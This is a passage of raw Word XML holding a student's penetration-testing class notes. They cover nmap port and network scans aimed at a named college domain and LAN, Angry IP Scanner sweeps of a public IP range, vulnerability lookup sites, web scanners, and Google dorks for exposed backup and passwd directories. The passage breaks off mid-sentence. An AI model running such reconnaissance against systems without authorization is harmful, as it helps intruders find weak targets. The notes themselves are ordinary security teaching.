    <w:p w14:paraId="00000269" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00923DCA"/>
    <w:p w14:paraId="0000026A" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00000000">
      <w:r>
        <w:t>65535 ports</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0000026B" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00923DCA"/>
    <w:p w14:paraId="0000026C" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00000000">
      <w:r>
        <w:t xml:space="preserve">Sometimes </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>its</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> important to scan all 65535 ports</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0000026D" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00000000">
      <w:r>
        <w:t>To scan all ports, we use the following command</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0000026E" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00923DCA"/>
    <w:p w14:paraId="0000026F" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00000000">
      <w:r>
        <w:t>#</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>nmap</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> -</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>sT</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> -p- kct.ac.in</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00000270" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00000000">
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Dont</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> use this scan frequently on a single target</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00000271" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00923DCA"/>
    <w:p w14:paraId="00000272" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00923DCA"/>
    <w:p w14:paraId="00000273" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00923DCA"/>
    <w:p w14:paraId="00000274" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00000000">
      <w:r>
        <w:t>INTERNAL SCAN</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00000275" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00000000">
      <w:r>
        <w:t>- How many computers are ON in our Lan (Host is Alive)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00000276" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00000000">
      <w:r>
        <w:t>- IP and MAC</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00000277" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00000000">
      <w:r>
        <w:t>- OS</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00000278" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00000000">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>- Open ports</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00000279" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00000000">
      <w:r>
        <w:t>- Running Services</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0000027A" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00923DCA"/>
    <w:p w14:paraId="0000027B" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00000000">
      <w:r>
        <w:t>#</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>nmap</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> (scan type) (network id)/8 for class A, 16 for class B, 24 for class C</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0000027C" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00923DCA"/>
    <w:p w14:paraId="0000027D" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00000000">
      <w:r>
        <w:t>192.168.0.112</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0000027E" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00923DCA"/>
    <w:p w14:paraId="0000027F" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00000000">
      <w:r>
        <w:t>#</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>nmap</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> -</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>sT</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> 192.168.0.0/24</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00000280" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00923DCA"/>
    <w:p w14:paraId="00000281" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00000000">
      <w:r>
        <w:t>EXTERNAL SCAN</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00000282" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00000000">
      <w:r>
        <w:t xml:space="preserve">- IS </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>ur</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> target domain or </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>ip</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> is alive or not</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00000283" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00000000">
      <w:r>
        <w:t>- IP and MAC</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00000284" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00000000">
      <w:r>
        <w:t>- OS</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00000285" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00000000">
      <w:r>
        <w:t>- Open ports</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00000286" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00000000">
      <w:r>
        <w:t>- Running Services</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00000287" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00923DCA"/>
    <w:p w14:paraId="00000288" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00000000">
      <w:r>
        <w:t>#</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>nmap</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> kct.ac.in</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00000289" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00923DCA"/>
    <w:p w14:paraId="0000028A" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00000000">
      <w:r>
        <w:t>NMAP SCRIPTING ENGINE</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0000028B" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00000000">
      <w:r>
        <w:t xml:space="preserve">Similar to extensions or add </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>ons</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> in a browser</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0000028C" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00923DCA"/>
    <w:p w14:paraId="0000028D" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00000000">
      <w:r>
        <w:t xml:space="preserve">File extension </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>- .</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>nse</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0000028E" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00000000">
      <w:r>
        <w:t xml:space="preserve">We can increase the functionality of </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>nmap</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> in enumeration, scanning, vulnerability assessment and exploitation.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0000028F" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00923DCA"/>
    <w:p w14:paraId="00000290" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00000000">
      <w:r>
        <w:t>Syntax</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00000291" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00000000">
      <w:r>
        <w:t>#</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>nmap</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> -</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>sT</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> --script (Script name) (target)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00000292" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00923DCA"/>
    <w:p w14:paraId="00000293" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00000000">
      <w:r>
        <w:t>Type of NSE files</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00000294" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00000000">
      <w:r>
        <w:t xml:space="preserve">- Internal Files (Inbuilt which comes along with </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>nmap</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00000295" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00000000">
      <w:r>
        <w:t>- External Files (Which we have to download from internet)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00000296" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00923DCA"/>
    <w:p w14:paraId="00000297" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00923DCA"/>
    <w:p w14:paraId="00000298" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00923DCA"/>
    <w:p w14:paraId="00000299" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00000000">
      <w:r>
        <w:t>TO DO</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0000029A" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00000000">
      <w:r>
        <w:t xml:space="preserve">1. Scan your LAN - Internal Scanning and check how many </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>host</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> is up</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0000029B" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00000000">
      <w:r>
        <w:t>2. Scan your target website and see how many ports are open</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0000029C" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00000000">
      <w:r>
        <w:t>3. Understand the meaning of each protocol which is linked with port number</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0000029D" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00000000">
      <w:r>
        <w:t xml:space="preserve">4. Use </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>nmap</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> scan to find OS of your target</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0000029E" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00000000">
      <w:r>
        <w:t xml:space="preserve">5. Use any one internal </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>nmap</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> script against </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>ur</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> target for enumeration</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0000029F" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00000000">
      <w:r>
        <w:t xml:space="preserve">6. Download any script from </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>github</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> or internet and paste it in </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>nmap</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> scripts folder and use it in </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>nmap</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> scan against </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>ur</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> target</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="000002A0" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00923DCA"/>
    <w:p w14:paraId="000002A1" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00923DCA"/>
    <w:p w14:paraId="000002A2" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00000000">
      <w:r>
        <w:t>ZENMAP</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="000002A3" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00000000">
      <w:r>
        <w:t xml:space="preserve">GUI of </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>nmap</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="000002A4" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00923DCA"/>
    <w:p w14:paraId="000002A5" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00000000">
      <w:r>
        <w:t>ANGRY IP SCANNER</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="000002A6" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00000000">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>- GUI</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="000002A7" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00000000">
      <w:r>
        <w:t>- Rapid scanner</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="000002A8" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00923DCA"/>
    <w:p w14:paraId="000002A9" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00000000">
      <w:r>
        <w:t>We can find all vulnerable devices (computer, printer, router, server, firewall) in your area through scanning</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="000002AA" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00000000">
      <w:r>
        <w:t>49.206.112.22</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="000002AB" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00923DCA"/>
    <w:p w14:paraId="000002AC" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00000000">
      <w:r>
        <w:t>method 1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="000002AD" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00000000">
      <w:r>
        <w:t>starting range</w:t>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>- 49.206.112.0</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="000002AE" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00000000">
      <w:r>
        <w:t xml:space="preserve">Ending range </w:t>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>- 49.206.112.255</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="000002AF" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00923DCA"/>
    <w:p w14:paraId="000002B0" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00000000">
      <w:r>
        <w:t>Method 2</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="000002B1" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00000000">
      <w:r>
        <w:t>starting range</w:t>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>- 49.206.0.0</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="000002B2" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00000000">
      <w:r>
        <w:t xml:space="preserve">Ending range </w:t>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>- 49.206.255.255</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="000002B3" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00923DCA"/>
    <w:p w14:paraId="000002B4" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00923DCA"/>
    <w:p w14:paraId="000002B5" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00923DCA"/>
    <w:p w14:paraId="000002B6" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00923DCA"/>
    <w:p w14:paraId="000002B7" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00000000">
      <w:r>
        <w:t>TO DO</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="000002B8" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00000000">
      <w:r>
        <w:t xml:space="preserve">- Learn all commands of slow and comprehensive scan of </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>zenmap</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="000002B9" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00923DCA"/>
    <w:p w14:paraId="000002BA" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00000000">
      <w:r>
        <w:t>VULNERABILITY ANALYSIS</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="000002BB" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00923DCA"/>
    <w:p w14:paraId="000002BC" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00000000">
      <w:r>
        <w:t xml:space="preserve">To check if our target is weak or not </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="000002BD" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00000000">
      <w:r>
        <w:t>or</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="000002BE" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00000000">
      <w:r>
        <w:t>what is the weakness of our target</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="000002BF" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00923DCA"/>
    <w:p w14:paraId="000002C0" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00000000">
      <w:r>
        <w:t>A. VULNERABILITY DATABASE</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="000002C1" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00000000">
      <w:r>
        <w:t>www.cvedetails.com</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="000002C2" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00000000">
      <w:r>
        <w:t>www.vuldb.com</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="000002C3" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00000000">
      <w:r>
        <w:t>www.exploit-db.com</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="000002C4" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00923DCA"/>
    <w:p w14:paraId="000002C5" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00923DCA"/>
    <w:p w14:paraId="000002C6" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00000000">
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>apache</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> 2.3.49 </w:t>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>- Server banner grabbing (when version of server is disclosed)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="000002C7" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00923DCA"/>
    <w:p w14:paraId="000002C8" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00923DCA"/>
    <w:p w14:paraId="000002C9" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00000000">
      <w:r>
        <w:t>B. WEBSITE BASED TOOLS</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="000002CA" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00000000">
      <w:r>
        <w:t xml:space="preserve">www.ssllabs.com (Any issue related to </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>ssl</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>tls</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>, certificates, encryption)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="000002CB" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00000000">
      <w:r>
        <w:t>www.sitecheck.sucuri.net</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="000002CC" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00000000">
      <w:r>
        <w:t>www.openpentest.com</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="000002CD" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00000000">
      <w:r>
        <w:t>www.geekflare.com</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="000002CE" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00000000">
      <w:r>
        <w:t>www.quttera.com (for checking if there are any malicious files in website)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="000002CF" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00000000">
      <w:r>
        <w:t>www.siteguarding.com (technical details, blacklist analysis)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="000002D0" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00000000">
      <w:r>
        <w:t>www.observatory.mozilla.org (</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>http,tls</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>ssh</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> analysis)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="000002D1" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00923DCA"/>
    <w:p w14:paraId="000002D2" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00923DCA"/>
    <w:p w14:paraId="000002D3" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00923DCA"/>
    <w:p w14:paraId="000002D4" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00000000">
      <w:r>
        <w:t>C. OS BASED TOOLS</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="000002D5" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00000000">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>D. BUG BOUNTY WEBSITES</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="000002D6" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00923DCA"/>
    <w:p w14:paraId="000002D7" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00923DCA"/>
    <w:p w14:paraId="000002D8" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00923DCA"/>
    <w:p w14:paraId="000002D9" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00000000">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:color w:val="FF0000"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>23-09-2021, THURSDAY</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="000002DA" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00923DCA"/>
    <w:p w14:paraId="000002DB" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00000000">
      <w:r>
        <w:t>C. OS BASED TOOLS</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="000002DC" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00000000">
      <w:r>
        <w:t>TOOLS - W3AF, DIRB, DIRSEARCH, NIKTO, WAFWOOF, LYNIS, RAPIDSCAN, NETSPARKER</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="000002DD" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00923DCA"/>
    <w:p w14:paraId="000002DE" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00000000">
      <w:r>
        <w:t>W3AF - Web Application, Attack &amp; Audit Framework</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="000002DF" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00923DCA"/>
    <w:p w14:paraId="000002E0" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00000000">
      <w:r>
        <w:t>DIRB - Directory Buster</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="000002E1" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00923DCA"/>
    <w:p w14:paraId="000002E2" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00000000">
      <w:r>
        <w:t>When we use google dorks, to identify vulnerable directories for a specific website</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="000002E3" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00000000">
      <w:r>
        <w:t xml:space="preserve">backup, trash, admin, </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>htaccess</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>, passwd</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="000002E4" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00923DCA"/>
    <w:p w14:paraId="000002E5" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00000000">
      <w:r>
        <w:t xml:space="preserve">index of backup </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>site:abc.com</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="000002E6" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00000000">
      <w:r>
        <w:t xml:space="preserve">index of trash </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>site:abc.com</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="000002E7" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00000000">
      <w:r>
        <w:t>We have more than 6000 + directories</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="000002E8" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00000000">
      <w:r>
        <w:t xml:space="preserve">and </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>its</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> a </w:t>
      </w:r>
